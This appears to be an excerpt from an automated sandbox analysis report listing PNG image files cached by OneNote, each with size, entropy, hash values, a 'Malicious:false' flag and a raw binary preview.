                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
